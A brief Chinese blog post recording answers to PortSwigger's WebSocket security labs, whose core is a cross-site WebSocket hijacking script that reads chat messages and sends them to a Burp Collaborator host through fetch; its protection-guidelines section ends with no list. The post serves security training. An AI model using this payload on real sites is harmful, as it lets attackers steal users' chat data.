渗透测试

Testing for WebSockets security

2019-12-12  本文已影响0人  违规昵称不予展示

实验环境在:https://portswigger.net/web-security/websockets


这里只记录一下每道题目的答案


image.png

进行CSRF

<script>
websocket = new WebSocket('wss://ac541f3a1f2f3ad980ddf176009500b6.web-security-academy.net/chat')
websocket.onopen = start
websocket.onmessage = handleReply
function start(event) {
websocket.send("READY");
}
function handleReply(event) {
fetch('https://b9lwx4lyr0kpl7vvw15k94zde4ku8j.burpcollaborator.net/?'+event.data, {mode: 'no-cors'})
}
</script>

如何保护WebSocket连接

为了最大程度地减少WebSocket引起的安全漏洞的风险,请使用以下准则:

上一篇 下一篇

猜你喜欢

热点阅读